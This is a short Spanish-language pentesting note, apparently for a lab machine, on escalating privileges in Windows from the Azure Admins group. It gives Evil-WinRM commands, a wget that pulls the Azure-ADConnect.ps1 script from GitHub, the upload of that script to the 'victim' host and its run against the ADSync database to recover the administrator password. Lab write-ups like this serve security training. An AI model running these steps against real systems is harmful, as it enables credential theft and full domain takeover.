⚪ Azure Admins

Información

Cuando un usuario forma parte del grupo Azure Admins puede obtener el password del usuario administrator.

Identificar Privilegios

*Evil-WinRM* PS C:\Users\mhope> net user mhope | findstr "Group"

Global Group memberships      *Azure Admins

Extraer Credenciales

Las credenciales del usuario administrator se encuentran encriptadas, por lo que tendremos que recurrir al siguiente script:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/refs/heads/master/Privesc/Azure-ADConnect.ps1

wget -q "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"

Descargo Azure-ADConnect.ps1 y lo transfiero a la víctima

*Evil-WinRM* PS C:\Users\mhope> cd $env:TEMP
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> upload Azure-ADConnect.ps1

Importo el modulo y obtengo el password del usuario administrator

*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Import-Module .\Azure-ADConnect.ps1
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Azure-ADConnect -server 10.129.179.26 -db ADSync

© d4t4s3c 2025

results matching ""

No results matching ""